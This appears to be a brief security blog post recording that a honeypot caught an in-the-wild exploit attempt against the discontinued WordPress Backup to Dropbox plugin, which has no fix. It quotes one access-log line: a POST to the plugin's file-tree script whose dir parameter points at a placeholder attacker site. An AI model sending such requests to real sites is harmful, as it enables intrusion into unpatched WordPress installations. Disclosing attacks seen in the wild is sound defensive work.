A honeypot at a client site caught this being exploited in the wild on 2022-08-09. The software, WordPress Backup to Dropbox Plugin for WordPress, was closed on 2018-02-07 so there is no fix.
REDACTED - - [09/Aug/2022:19:01:39 -0400] "POST /Views/wpb2d-file-tree.php?dir=[attacker site] HTTP/1.1" 404 741 "google.com" "scalaj-http/2.4.2"
The Darius Freamon Blog 